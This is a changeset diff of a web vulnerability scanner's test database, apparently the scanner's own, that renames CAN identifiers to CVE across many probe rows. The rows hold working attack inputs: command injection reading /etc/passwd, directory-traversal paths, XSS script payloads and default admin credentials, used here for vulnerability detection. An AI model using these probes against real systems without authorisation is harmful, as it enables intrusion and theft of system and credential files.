Context Navigation

← Previous Changeset
Next Changeset →

Changeset 332

Timestamp:

02/26/2010 03:07:49 PM (3 years ago)

Author:

sullo

Message:

s/CAN-/CVE-/g

File:

: 1 edited

trunk/plugins/db_tests (modified) (15 diffs)

Legend:

: Unmodified
: Added
: Removed

trunk/plugins/db_tests

-                      r331
+                      r332
 "001189","3092","23","/_vti_pvt/doctodep.btr","GET","200","","","","","FrontPage file found. This may contain useful information.","",""
 "001190","3092","23","/_vti_pvt/services.org","GET","200","","","","","FrontPage file found. This may contain useful information.","",""
 "001191","3092","3","/_vti_bin/shtml.dll/_vti_rpc?method=server+version%3a4%2e0%2e2%2e2611","POST","200","","","FrontPage Error","","Gives info about server settings. CAN-2000-0413, CAN-2000-0709, CAN-2000-0710, BID-1608, BID-1174.","",""
 "001192","3092","3","/_vti_bin/shtml.exe/_vti_rpc?method=server+version%3a4%2e0%2e2%2e2611","POST","200","","","Unknown CONTENT_TYPE","","Gives info about server settings.","",""
+"001191","28260","3","/_vti_bin/shtml.dll/_vti_rpc?method=server+version%3a4%2e0%2e2%2e2611","POST","200","","","FrontPage Error","","Gives info about server settings. CVE-2000-0413, CVE-2000-0709, CVE-2000-0710, BID-1608, BID-1174.","",""
+"001192","28260","3","/_vti_bin/shtml.exe/_vti_rpc?method=server+version%3a4%2e0%2e2%2e2611","POST","200","","","Unknown CONTENT_TYPE","","Gives info about server settings.","",""
 "001193","3092","a","/_vti_bin/_vti_aut/author.dll?method=list+documents%3a3%2e0%2e2%2e1706&service%5fname=&listHiddenDocs=true&listExplorerDocs=true&listRecurse=false&listFiles=true&listFolders=true&listLinkInfo=true&listIncludeParent=true&listDerivedT=false&listBorders=fals","POST","200","","","specified module could not be found","","We seem to have authoring access to the FrontPage web.","",""
 "001194","3092","a","/_vti_bin/_vti_aut/author.exe?method=list+documents%3a3%2e0%2e2%2e1706&service%5fname=&listHiddenDocs=true&listExplorerDocs=true&listRecurse=false&listFiles=true&listFolders=true&listLinkInfo=true&listIncludeParent=true&listDerivedT=false&listBorders=fals","POST","200","","","specified module could not be found","","We seem to have authoring access to the FrontPage web.","",""
 …
 "001448","2117","b","/","GET","samba is configured to deny","","","","","Samba-swat web server. Used to administer Samba.","",""
 "001449","2117","b","/cpanel/","GET","200","","","","","Web-based control panel","",""
 "001450","2119","9","/shopexd.asp?catalogid='42","GET","catalogid='42'","","","","","VP-ASP Shopping Cart 5.0 contains multiple SQL injection vulnerabilities. CAN-2003-0560, BID-8159","",""
 "001451","2119","9","/shopping/diag_dbtest.asp","GET","200","","","","","VP-ASP Shopping Cart 5.0 contains multiple SQL injection vulnerabilities. CAN-2003-0560, BID-8159","",""
 "001452","2234","3","/_vti_bin/fpcount.exe/","GET","Empty output from CGI program","","","","","The VisNetic WebSite 3.5, Service release 17 reveals system paths when certain non-existing files are requested. See http://www.krusesecurity.dk/advisories/vis0103.txt for more information. CAN-1999-1376. BID-2252.","",""
+"001450","2119","9","/shopexd.asp?catalogid='42","GET","catalogid='42'","","","","","VP-ASP Shopping Cart 5.0 contains multiple SQL injection vulnerabilities. CVE-2003-0560, BID-8159","",""
+"001451","2119","9","/shopping/diag_dbtest.asp","GET","200","","","","","VP-ASP Shopping Cart 5.0 contains multiple SQL injection vulnerabilities. CVE-2003-0560, BID-8159","",""
+"001452","2234","3","/_vti_bin/fpcount.exe/","GET","Empty output from CGI program","","","","","The VisNetic WebSite 3.5, Service release 17 reveals system paths when certain non-existing files are requested. See http://www.krusesecurity.dk/advisories/vis0103.txt for more information. CVE-1999-1376. BID-2252.","",""
 "001453","2390","4","/forum/index.php?method=&lt;script&gt;alert('Vulnerable')&lt;/script&gt;","GET","<script>alert('Vulnerable')</script>","","","","","Zorum v3.4 and below are vulnerable to XSS attacks.","",""
 "001454","2390","4","/zorum/index.php?method=&lt;script&gt;alert('Vulnerable')&lt;/script&gt;","GET","<script>alert('Vulnerable')</script>","","","","","Zorum v3.4 and below are vulnerable to XSS attacks.","",""
 …
 "001490","2813","4","/admin/database/wwForum.mdb","GET","200","","","","","Web Wiz Forums pre 7.5 is vulnerable to Cross-Site Scripting attacks. Default login/pass is Administrator/letmein","",""
 "001491","2830","5","/../config.dat","GET","EnablePasswords","","","","","Directory traversal and config.dat suggests NetServe web server and default admin folder. This file contains the administrative login/pass.","",""
 "001492","284","3","/iisadmpwd/aexp2.htr","GET","200","","","value=\"\"","","Gives domain and system name, may allow an attacker to brute force for access. Also will allow an NT4 user to change his password regardless of the 'user cannot change password' security policy. CAN-1999-0407. BID-4236. BID-2110.","",""
 "001493","284","3","/iisadmpwd/aexp2b.htr","GET","200","","","value=\"\"","","Gives domain and system name, may allow an attacker to brute force for access. Also will allow an NT4 user to change his password regardless of the 'user cannot change password' security policy. CAN-1999-0407. BID-4236. BID-2110.","",""
 "001494","284","3","/iisadmpwd/aexp3.htr","GET","200","","","value=\"\"","","Gives domain and system name, may allow an attacker to brute force for access. Also will allow an NT4 user to change his password regardless of the 'user cannot change password' security policy. CAN-1999-0407. BID-4236. BID-2110.","",""
 "001495","284","3","/iisadmpwd/aexp4.htr","GET","200","","","value=\"\"","","Gives domain and system name, may allow an attacker to brute force for access. Also will allow an NT4 user to change his password regardless of the 'user cannot change password' security policy. CAN-1999-0407. BID-4236. BID-2110.","",""
 "001496","284","3","/iisadmpwd/aexp4b.htr","GET","200","","","value=\"\"","","Gives domain and system name, may allow an attacker to brute force for access. Also will allow an NT4 user to change his password regardless of the 'user cannot change password' security policy. CAN-1999-0407. BID-4236. BID-2110.","",""
+"001492","284","3","/iisadmpwd/aexp2.htr","GET","200","","","value=\"\"","","Gives domain and system name, may allow an attacker to brute force for access. Also will allow an NT4 user to change his password regardless of the 'user cannot change password' security policy. CVE-1999-0407. BID-4236. BID-2110.","",""
+"001493","284","3","/iisadmpwd/aexp2b.htr","GET","200","","","value=\"\"","","Gives domain and system name, may allow an attacker to brute force for access. Also will allow an NT4 user to change his password regardless of the 'user cannot change password' security policy. CVE-1999-0407. BID-4236. BID-2110.","",""
+"001494","284","3","/iisadmpwd/aexp3.htr","GET","200","","","value=\"\"","","Gives domain and system name, may allow an attacker to brute force for access. Also will allow an NT4 user to change his password regardless of the 'user cannot change password' security policy. CVE-1999-0407. BID-4236. BID-2110.","",""
+"001495","284","3","/iisadmpwd/aexp4.htr","GET","200","","","value=\"\"","","Gives domain and system name, may allow an attacker to brute force for access. Also will allow an NT4 user to change his password regardless of the 'user cannot change password' security policy. CVE-1999-0407. BID-4236. BID-2110.","",""
+"001496","284","3","/iisadmpwd/aexp4b.htr","GET","200","","","value=\"\"","","Gives domain and system name, may allow an attacker to brute force for access. Also will allow an NT4 user to change his password regardless of the 'user cannot change password' security policy. CVE-1999-0407. BID-4236. BID-2110.","",""
 "001497","2842","a","//admin/aindex.htm","GET","200","","","","","FlexWATCH firmware 2.2 is vulnerable to authentication bypass by prepending an extra '/'. http://packetstorm.linuxsecurity.com/0310-exploits/FlexWATCH.txt","",""
 "001498","2873","a","@CGIDIRSgbadmin.cgi?action=change_adminpass","GET","200","","","","","RNN Guestbook 1.2 contains multiple vulnerabilities including remotely changing administrative password, deleting posts, changing the setup, remotely executing commands, and more. By default, the admin password is either 'admin' or 'demo'. See Nov 26, 200","",""
 …
 "002974","3233","2","/index.html.var","GET","200","","","","","Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.","",""
 "002975","3233","2","/test","GET","test hierarchy","","","","","Apache Tomcat default file found. All default files should be removed.","",""
 "002976","3233","2","/iissamples/issamples/codebrws.asp","GET","Sample ASP Search Form","","","","","This is a default IIS script/file which should be  removed. CAN-1999-0739. MS99-013.","",""
+"002976","3233","2","/iissamples/issamples/codebrws.asp","GET","Sample ASP Search Form","","","","","This is a default IIS script/file which should be  removed. CVE-1999-0739. MS99-013.","",""
 "002977","3233","2","/iissamples/issamples/ixqlang.htm","GET","Query Language","","","","","IIS default file found. All default files should be removed.","",""
 "002978","3233","2","/iissamples/issamples/Winmsdp.exe","GET","Sample ASP Search Form","","","","","This is a default IIS script/file which should be  removed. CAN-1999-0738. MS99-013.","",""
 "002979","3233","2","/iissamples/sdk/asp/docs/codebrw2.asp","GET","200","","","","","This is a default IIS script/file which should be  removed. CAN-1999-0739. MS99-013.","",""
 "002980","3233","2","/iissamples/sdk/asp/docs/codebrws.asp","GET","200","","","","","This is a default IIS script/file which should be  removed. CAN-1999-0739. MS99-013.","",""
 "002981","3233","2","/iissamples/sdk/asp/docs/Winmsdp.exe","GET","200","","","","","This is a default IIS script/file which should be  removed. CAN-1999-0738. MS99-013.","",""
+"002978","3233","2","/iissamples/issamples/Winmsdp.exe","GET","Sample ASP Search Form","","","","","This is a default IIS script/file which should be  removed. CVE-1999-0738. MS99-013.","",""
+"002979","3233","2","/iissamples/sdk/asp/docs/codebrw2.asp","GET","200","","","","","This is a default IIS script/file which should be  removed. CVE-1999-0739. MS99-013.","",""
+"002980","3233","2","/iissamples/sdk/asp/docs/codebrws.asp","GET","200","","","","","This is a default IIS script/file which should be  removed. CVE-1999-0739. MS99-013.","",""
+"002981","3233","2","/iissamples/sdk/asp/docs/Winmsdp.exe","GET","200","","","","","This is a default IIS script/file which should be  removed. CVE-1999-0738. MS99-013.","",""
 "002982","3233","2","/mc-icons/","GET","Index of","","","","","Default Netscape/iPlanet ns-icons and mc-icons are present. Edit the obj.conf and remove them. All default files should be removed.","",""
 "002983","3233","2","/ns-icons/","GET","Index of","","","","","Default Netscape/iPlanet ns-icons and mc-icons are present. Edit the obj.conf and remove them. All default files should be removed.","",""
 …
 "003017","3281","4","/search.asp?Search=\">&lt;script&gt;alert(Vulnerable)&lt;/script&gt;","GET",">&lt;script&gt;alert()&lt;/script&gt;","","","","","Max Web Portal is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
 "003018","3282","8","/uploader.php","GET","200","","","","","This script may allow arbitrary files to be uploaded to the remote server.","",""
 "003019","3284","3","/iissamples/sdk/asp/docs/Winmsdp.exe?Source=/IISSAMPLES/%c0%ae%c0%ae/%c0%ae%c0%ae/bogus_directory/nonexistent.asp","GET","Path not found","","","","","Winmsdp.exe can be used to determine if a file system path exists or not. CAN-1999-0738. MS99-013.","",""
 "003020","3284","5","/iissamples/sdk/asp/docs/Winmsdp.exe","GET","View Active Server Page Source","","","","","IIS 5 comes with an ASP that allows remote code to viewed. All default files in /IISSamples should be removed. CAN-1999-0738. MS99-013.","",""
 "003021","3284","5","/iissamples/sdk/asp/docs/Winmsdp.exe?Source=/IISSAMPLES/%c0%ae%c0%ae/default.asp","GET","200","","","","","IIS may be vulnerable to source code viewing via the example Winmsdp.exe file. Remove all default files from the web root. CAN-1999-0738. MS99-013.","",""
+"003019","3284","3","/iissamples/sdk/asp/docs/Winmsdp.exe?Source=/IISSAMPLES/%c0%ae%c0%ae/%c0%ae%c0%ae/bogus_directory/nonexistent.asp","GET","Path not found","","","","","Winmsdp.exe can be used to determine if a file system path exists or not. CVE-1999-0738. MS99-013.","",""
+"003020","3284","5","/iissamples/sdk/asp/docs/Winmsdp.exe","GET","View Active Server Page Source","","","","","IIS 5 comes with an ASP that allows remote code to viewed. All default files in /IISSamples should be removed. CVE-1999-0738. MS99-013.","",""
+"003021","3284","5","/iissamples/sdk/asp/docs/Winmsdp.exe?Source=/IISSAMPLES/%c0%ae%c0%ae/default.asp","GET","200","","","","","IIS may be vulnerable to source code viewing via the example Winmsdp.exe file. Remove all default files from the web root. CVE-1999-0738. MS99-013.","",""
 "003022","3284","6","/iissamples/exair/howitworks/Winmsdp.exe","GET","ASP Source code browser","","","","","This is a default IIS script/file which should be  removed, it may allow a DoS against the server. CVE-1999-1451, XF-2371, MS99-013 and MSKB-Q231368","",""
 "003023","3285","7","/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwinnt%5cwin.ini","GET","[fonts]","","","","","Abyss allows directory traversal if %5c is in a URL. Upgrade to the latest version.","",""
 "003024","3285","7","/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwinnt%5cwin.ini","GET","[windows]","","","","","Abyss allows directory traversal if %5c is in a URL. Upgrade to the latest version.","",""
 "003025","3286","5","/conspass.chl+","GET","200","","","","","Abyss allows hidden/protected files to be served if a + is added to the request. CAN-2002-1081","",""
 "003026","3286","5","/consport.chl+","GET","200","","","","","Abyss allows hidden/protected files to be served if a + is added to the request. CAN-2002-1081","",""
 "003027","3286","5","/general.chl+","GET","200","","","","","Abyss allows hidden/protected files to be served if a + is added to the request. CAN-2002-1081","",""
 "003028","3286","5","/srvstatus.chl+","GET","200","","","","","Abyss allows hidden/protected files to be served if a + is added to the request. CAN-2002-1081","",""
+"003025","3286","5","/conspass.chl+","GET","200","","","","","Abyss allows hidden/protected files to be served if a + is added to the request. CVE-2002-1081","",""
+"003026","3286","5","/consport.chl+","GET","200","","","","","Abyss allows hidden/protected files to be served if a + is added to the request. CVE-2002-1081","",""
+"003027","3286","5","/general.chl+","GET","200","","","","","Abyss allows hidden/protected files to be served if a + is added to the request. CVE-2002-1081","",""
+"003028","3286","5","/srvstatus.chl+","GET","200","","","","","Abyss allows hidden/protected files to be served if a + is added to the request. CVE-2002-1081","",""
 "003029","3288","3","///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////","GET","index of","","","","","Abyss 1.03 reveals directory listing when    /'s are requested.","",""
 "003030","3289","4","/firewall/policy/dlg?q=-1&fzone=t<script>alert('Vulnerable')</script>>&tzone=dmz","GET","<script>alert('Vulnerable')</script>","","","","","Fortigate firewall 2.50 and prior contains several CSS vulnerabilities in various administrative pages.","",""
 …
 "003068","3399","d","/cfide/administrator/index.cfm","GET","PasswordProvided","","","","","Coldfusion 4.5.1 and earlier may have an overflow DoS by modifying the login page and submit 40k character passwords. This page should not be accessible to all users. CVE-2000-0538, ALLAIRE:ASB00-14, BID-1314.","",""
 "003069","3399","d","/CFIDE/administrator/index.cfm","GET","PasswordProvided","","","","","ColdFusion Administrator for Coldfusion 4.5.1 and earlier may have an overflow DoS by modifying the login page and submit 40k character passwords. This page should not be accessible to all users. CVE-2000-0538. ALLAIRE:ASB00-14. BID-1314.","",""
 "003070","3407","7","/directory.php?dir=%3Bcat%20/etc/passwd","GET","root:","","","","","Marcus S. Xenakis directory.php script allows for command execution. CAN-2002-0434.","",""
+"003070","3407","7","/directory.php?dir=%3Bcat%20/etc/passwd","GET","root:","","","","","Marcus S. Xenakis directory.php script allows for command execution. CVE-2002-0434.","",""
 "003071","3410","7","/content/base/build/explorer/none.php?..:..:..:..:..:..:..:etc:passwd:","GET","root:","","","","","SunPS iRunbook Version 2.5.2 allows files to be read remotely.","",""
 "003072","3410","7","/content/base/build/explorer/none.php?/etc/passwd","GET","root:","","","","","SunPS iRunbook Version 2.5.2 allows files to be read remotely.","",""
 "003073","3411","3","/soapConfig.xml","GET","200","","","","","Oracle 9iAS configuration file found - see bugrtraq #4290.","",""
 "003074","3412","7","@CGIDIRSbbcode_ref.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK","GET","root:","","","","","PHPNuke is vulnerable to a remote file retrieval vul. It should be upgraded to the latest version. CAN-2001-0320","",""
 "003075","3412","7","@NUKEbbcode_ref.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK","GET","root:","","","","","PHPNuke is vulnerable to a remote file retrieval vul. It should be upgraded to the latest version. CAN-2001-0320","",""
+"003074","3412","7","@CGIDIRSbbcode_ref.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK","GET","root:","","","","","PHPNuke is vulnerable to a remote file retrieval vul. It should be upgraded to the latest version. CVE-2001-0320","",""
+"003075","3412","7","@NUKEbbcode_ref.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK","GET","root:","","","","","PHPNuke is vulnerable to a remote file retrieval vul. It should be upgraded to the latest version. CVE-2001-0320","",""
 "003076","3414","3","@CGIDIRSGW5/GWWEB.EXE?GET-CONTEXT&HTMLVER=AAA","GET","SYS:","","","","","Some Netware web servers reveal the system path to files when unexpected arguments are sent to CGI.","",""
 "003077","3416","7","/GW5/GWWEB.EXE?HELP=bad-request","GET","Could not find file SYS","","","","","Groupwise allows system information and file retrieval by modifying arguments to the help system.","",""
 "003078","3416","7","/GWWEB.EXE?HELP=bad-request","GET","Could not find file SYS","","","","","Groupwise allows system information and file retrieval by modifying arguments to the help system. CAN-2002-0341.","",""
+"003078","3416","7","/GWWEB.EXE?HELP=bad-request","GET","Could not find file SYS","","","","","Groupwise allows system information and file retrieval by modifying arguments to the help system. CVE-2002-0341.","",""
 "003079","3416","7","@CGIDIRSGW5/GWWEB.EXE?HELP=bad-request","GET","Could not find file SYS","","","","","Groupwise allows system information and file retrieval by modifying arguments to the help system.","",""
 "003080","3416","7","@CGIDIRSGWWEB.EXE?HELP=bad-request","GET","Could not find file SYS","","","","","Groupwise allows system information and file retrieval by modifying arguments to the help system.","",""
 "003081","3417","4","/examplesWebApp/InteractiveQuery.jsp?person=<script>alert('Vulnerable')</script>","GET","<script>alert('Vulnerable')</script>","","","","","BEA WebLogic 8.1 and below are vulnerable to Cross Site Scripting (XSS) in example code. CAN-2003-0624. CA-2000-02.","",""
+"003081","3417","4","/examplesWebApp/InteractiveQuery.jsp?person=<script>alert('Vulnerable')</script>","GET","<script>alert('Vulnerable')</script>","","","","","BEA WebLogic 8.1 and below are vulnerable to Cross Site Scripting (XSS) in example code. CVE-2003-0624. CA-2000-02.","",""
 "003082","3423","3","/XSQLConfig.xml","GET","200","","","","","Oracle 9iAS configuration file found - see bugrtraq #4290.","",""
 "003083","3458","4","/sgdynamo.exe?HTNAME=<script>alert('Vulnerable')</script>","GET","<script>alert('Vulnerable')</script>","","","","","Ecometry's SGDynamo is vulnerable to Cross Site Scripting (XSS). CAN-2002-0375. CA-2000-02.","",""
 "003084","3483","3","/docs/<script>alert('Vulnerable');</script>","GET","<script>alert('Vulnerable');</script>","","","","","Nokia Electronic Documentation is vulneable to Cross Site Scripting (XSS). CAN-2003-0801.","",""
 "003085","3484","3","/docs/NED?action=retrieve&location=.","GET","docs\ned","","","","","Nokia Electronic Documentation allows directory listings and reveals its installation path. CAN-2003-0802.","",""
 "003086","3486","4","/aktivate/cgi-bin/catgy.cgi?key=0&cartname=axa200135022551089&desc=<script>alert('Vulnerable')</script>","GET","<script>alert('Vulnerable')</script>","","","","","Aktivate Shopping Cart 1.03 and lower are vulnerable to Cross Site Scripting (XSS). http://www.allen0keul.com/aktivate/ CAN-2001-1212, CA-2000-02.","",""
 "003087","3487","d","/lcgi/ndsobj.nlm","GET","SCRIPT_NAME","","","","","Novell Netware 5.1 contains a buffer overflow, also, if Groupwise is enabled remote enumeration of users, groups and system information might be possible (CAN-2001-1233)","",""
 "003088","3489","3","/surf/scwebusers","GET","200","","","","","SurfControl SuperScout Web Reports Server user and password file is available. CAN-2002-0705.","",""
 "003089","3500","8","/_vti_bin/fpcount.exe","GET","specified CGI application misbehaved","","","","","Frontpage counter CGI has been found. FP Server version 97 allows remote users to execute arbitrary system commands, though a vulnerability in this version could not be confirmed. CAN-1999-1376. BID-2252.","",""
 "003090","3501","3","/_private/form_results.htm","GET","200","","","cannot be displayed","","This file may contain information submitted by other web users via forms. CAN-1999-1052.","",""
 "003091","3501","3","/_private/form_results.html","GET","200","","","cannot be displayed","","This file may contain information submitted by other web users via forms. CAN-1999-1052.","",""
 "003092","3501","3","/_private/form_results.txt","GET","200","","","cannot be displayed","","This file may contain information submitted by other web users via forms. CAN-1999-1052.","",""
+"003083","3458","4","/sgdynamo.exe?HTNAME=<script>alert('Vulnerable')</script>","GET","<script>alert('Vulnerable')</script>","","","","","Ecometry's SGDynamo is vulnerable to Cross Site Scripting (XSS). CVE-2002-0375. CA-2000-02.","",""
+"003084","3483","3","/docs/<script>alert('Vulnerable');</script>","GET","<script>alert('Vulnerable');</script>","","","","","Nokia Electronic Documentation is vulneable to Cross Site Scripting (XSS). CVE-2003-0801.","",""
+"003085","3484","3","/docs/NED?action=retrieve&location=.","GET","docs\ned","","","","","Nokia Electronic Documentation allows directory listings and reveals its installation path. CVE-2003-0802.","",""
+"003086","3486","4","/aktivate/cgi-bin/catgy.cgi?key=0&cartname=axa200135022551089&desc=<script>alert('Vulnerable')</script>","GET","<script>alert('Vulnerable')</script>","","","","","Aktivate Shopping Cart 1.03 and lower are vulnerable to Cross Site Scripting (XSS). http://www.allen0keul.com/aktivate/ CVE-2001-1212, CA-2000-02.","",""
+"003087","3487","d","/lcgi/ndsobj.nlm","GET","SCRIPT_NAME","","","","","Novell Netware 5.1 contains a buffer overflow, also, if Groupwise is enabled remote enumeration of users, groups and system information might be possible.CVE-2001-1233","",""
+"003088","3489","3","/surf/scwebusers","GET","200","","","","","SurfControl SuperScout Web Reports Server user and password file is available. CVE-2002-0705.","",""
+"003089","3500","8","/_vti_bin/fpcount.exe","GET","specified CGI application misbehaved","","","","","Frontpage counter CGI has been found. FP Server version 97 allows remote users to execute arbitrary system commands, though a vulnerability in this version could not be confirmed. CVE-1999-1376. BID-2252.","",""
+"003090","3501","3","/_private/form_results.htm","GET","200","","","cannot be displayed","","This file may contain information submitted by other web users via forms. CVE-1999-1052.","",""
+"003091","3501","3","/_private/form_results.html","GET","200","","","cannot be displayed","","This file may contain information submitted by other web users via forms. CVE-1999-1052.","",""
+"003092","3501","3","/_private/form_results.txt","GET","200","","","cannot be displayed","","This file may contain information submitted by other web users via forms. CVE-1999-1052.","",""
 "003093","3512","7","/scripts/tools/getdrvrs.exe","GET","200","","","","","MS Jet database engine can be used to make DSNs, useful with an ODBC exploit and the RDS exploit (with msadcs.dll) which mail allow command execution. RFP9901 (http://www.wiretrip.net/rfp/p/doc.asp/i2/d3.htm).","",""
 "003094","3513","7","@CGIDIRSwebbbs/webbbs_config.pl?name=joe&email=test@example.com&body=aaaaffff&followup=10;cat%20/etc/passwd","GET","root:","","","","","WebBBS by Darryl Burgdorf is vulnerable to command execution.","",""
 "003095","3514","7","@CGIDIRSvote.cgi","GET","200","","","","","Mike's Vote CGI contained a bug which allowed arbitrary command execution (version 1.2), see http://freshmeat.net/projects/mikessurveycgi/","",""
 "003096","3515","7","@CGIDIRSquizme.cgi","GET","200","","","","","Mike's Quiz Me! CGI contained a bug which allowed arbitrary command execution (version 0.5), see http://freshmeat.net/users/mikespice/","",""
 "003097","3565","3","//","OPTIONS","not found for:","","","","","By sending an OPTIONS request for /, the physical path to PHP can be revealed. CAN-2002-0240, BID-8119, BID-4057, http://archives.neohapsis.com/archives/bugtraq/2002-02/0043.html.","",""
 "003098","3566","7","/shop/normal_html.cgi?file=../../../../../../etc/issue%00","GET","root:","","","","","Happymail E-Commerce 4.3/4.4 allows arbitrary files to be retrieved remotely. CAN-2003-0243.","",""
 "003099","3566","7","/shop/normal_html.cgi?file=;cat%20/etc/passwd|","GET","root:","","","","","Happymail E-Commerce 4.3/4.4 allows arbitrary commands to be executed remotely. CAN-2003-0243.","",""
 "003100","3566","7","/shop/normal_html.cgi?file=|cat%20/etc/passwd|","GET","root:","","","","","Happymail E-Commerce 4.3/4.4 allows arbitrary commands to be executed remotely. CAN-2003-0243.","",""
 "003101","3567","7","/shop/member_html.cgi?file=;cat%20/etc/passwd|","GET","root:","","","","","Happymail E-Commerce 4.3/4.4 allows arbitrary commands to be executed remotely. CAN-2003-0243.","",""
 "003102","3567","7","/shop/member_html.cgi?file=|cat%20/etc/passwd|","GET","root:","","","","","Happymail E-Commerce 4.3/4.4 allows arbitrary commands to be executed remotely. CAN-2003-0243.","",""
 "003103","3568","7","@CGIDIRSsendform.cgi","GET","200","","","","","This CGI by Rod Clark (v1.4.4 and below) may allow arbitrary file reading via email or allow spam to be sent. CAN-2002-0710. BID-5286.","",""
+"003097","3565","3","//","OPTIONS","not found for:","","","","","By sending an OPTIONS request for /, the physical path to PHP can be revealed. CVE-2002-0240, BID-8119, BID-4057, http://archives.neohapsis.com/archives/bugtraq/2002-02/0043.html.","",""
+"003098","3566","7","/shop/normal_html.cgi?file=../../../../../../etc/issue%00","GET","root:","","","","","Happymail E-Commerce 4.3/4.4 allows arbitrary files to be retrieved remotely. CVE-2003-0243.","",""
+"003099","3566","7","/shop/normal_html.cgi?file=;cat%20/etc/passwd|","GET","root:","","","","","Happymail E-Commerce 4.3/4.4 allows arbitrary commands to be executed remotely. CVE-2003-0243.","",""
+"003100","3566","7","/shop/normal_html.cgi?file=|cat%20/etc/passwd|","GET","root:","","","","","Happymail E-Commerce 4.3/4.4 allows arbitrary commands to be executed remotely. CVE-2003-0243.","",""
+"003101","3567","7","/shop/member_html.cgi?file=;cat%20/etc/passwd|","GET","root:","","","","","Happymail E-Commerce 4.3/4.4 allows arbitrary commands to be executed remotely. CVE-2003-0243.","",""
+"003102","3567","7","/shop/member_html.cgi?file=|cat%20/etc/passwd|","GET","root:","","","","","Happymail E-Commerce 4.3/4.4 allows arbitrary commands to be executed remotely. CVE-2003-0243.","",""
+"003103","3568","7","@CGIDIRSsendform.cgi","GET","200","","","","","This CGI by Rod Clark (v1.4.4 and below) may allow arbitrary file reading via email or allow spam to be sent. CVE-2002-0710. BID-5286.","",""
 "003104","3569","7","/boilerplate.asp?NFuse_Template=.../.../.../.../.../.../.../.../.../boot.ini&NFuse_CurrentFolder=/","GET","boot loader","","","","","Citrix CGI allows directory traversal.","",""
 "003105","3570","2","/proxy/ssllogin?user=administrator&password=administrator","GET",">administrator<","","","","","Compaq Web-Based Management allows login with id/pass 'administrator'/'administrator'.","",""
 …
 "003124","3762","4","/debug/errorInfo?title===<script>alert('Vulnerable');</script>","GET","<script>alert('Vulnerable');</script>","","","","","The TCLHttpd 3.4.2 server is vulnerable to Cross Site Scripting (XSS) in debug scripts. CA-2000-02.","",""
 "003125","3762","4","/debug/showproc?proc===<script>alert('Vulnerable');</script>","GET","<script>alert('Vulnerable');</script>","","","","","The TCLHttpd 3.4.2 server is vulnerable to Cross Site Scripting (XSS) in debug scripts.","",""
 "003126","379","8","/site/eg/source.asp","GET","200","","","","","This asp (installed with Apache::ASP) allows attackers to upload files to the server. Upgrade to 1.95 or higher. CAN-2000-0628.","",""
+"003126","379","8","/site/eg/source.asp","GET","200","","","","","This asp (installed with Apache::ASP) allows attackers to upload files to the server. Upgrade to 1.95 or higher. CVE-2000-0628.","",""
 "003127","3800","7","@PHPMYADMINexport.php?what=../../../../../../../../../../../../etc/passwd%00","GET","root:","","","","","phpMyAdmin is vulnerable to a directory traversal attack.","",""
 "003128","383","2","/~nobody/etc/passwd","GET","root:","","","","","Apache is misconfigured to view files by accessing ~nobody/filename. Change UserDir from './' to something else in httpd.conf.","",""
 …
 "003200","4360","2","/acart2_0/acart2_0.mdb","GET","200","","","","","Alan Ward A-Cart 2.0 allows remote user to read customer database file which may contain usernames, passwords, credit cards and more.","",""
 "003201","4361","2","/acart2_0/admin/category.asp","GET","200","","","","","Alan Ward A-Cart 2.0 is vulnerable to an XSS attack which may cause the administrator to delete database information.","",""
 "003202","474","7","/Sites/Knowledge/Membership/Inspired/ViewCode.asp","GET","200","","","","","The default ViewCode.asp can allow an attacker to read any file on the machine. CAN-1999-0737. MS99-013.","",""
 "003203","474","7","/Sites/Knowledge/Membership/Inspiredtutorial/ViewCode.asp","GET","200","","","","","The default ViewCode.asp can allow an attacker to read any file on the machine. CAN-1999-0737. MS99-013.","",""
 "003204","474","7","/Sites/Samples/Knowledge/Membership/Inspired/ViewCode.asp","GET","200","","","","","The default ViewCode.asp can allow an attacker to read any file on the machine. CAN-1999-0737. MS99-013.","",""
 "003205","474","7","/Sites/Samples/Knowledge/Membership/Inspiredtutorial/ViewCode.asp","GET","200","","","","","The default ViewCode.asp can allow an attacker to read any file on the machine. CAN-1999-0737. MS99-013.","",""
 "003206","474","7","/Sites/Samples/Knowledge/Push/ViewCode.asp","GET","200","","","","","The default ViewCode.asp can allow an attacker to read any file on the machine. CAN-1999-0737. MS99-013.","",""
 "003207","474","7","/Sites/Samples/Knowledge/Search/ViewCode.asp","GET","200","","","","","The default ViewCode.asp can allow an attacker to read any file on the machine. CAN-1999-0737. MS99-013.","",""
 "003208","474","7","/SiteServer/Publishing/ViewCode.asp","GET","200","","","","","The default ViewCode.asp can allow an attacker to read any file on the machine. CAN-1999-0737. MS99-013.","",""
+"003202","474","7","/Sites/Knowledge/Membership/Inspired/ViewCode.asp","GET","200","","","","","The default ViewCode.asp can allow an attacker to read any file on the machine. CVE-1999-0737. MS99-013.","",""
+"003203","474","7","/Sites/Knowledge/Membership/Inspiredtutorial/ViewCode.asp","GET","200","","","","","The default ViewCode.asp can allow an attacker to read any file on the machine. CVE-1999-0737. MS99-013.","",""
+"003204","474","7","/Sites/Samples/Knowledge/Membership/Inspired/ViewCode.asp","GET","200","","","","","The default ViewCode.asp can allow an attacker to read any file on the machine. CVE-1999-0737. MS99-013.","",""
+"003205","474","7","/Sites/Samples/Knowledge/Membership/Inspiredtutorial/ViewCode.asp","GET","200","","","","","The default ViewCode.asp can allow an attacker to read any file on the machine. CVE-1999-0737. MS99-013.","",""
+"003206","474","7","/Sites/Samples/Knowledge/Push/ViewCode.asp","GET","200","","","","","The default ViewCode.asp can allow an attacker to read any file on the machine. CVE-1999-0737. MS99-013.","",""
+"003207","474","7","/Sites/Samples/Knowledge/Search/ViewCode.asp","GET","200","","","","","The default ViewCode.asp can allow an attacker to read any file on the machine. CVE-1999-0737. MS99-013.","",""
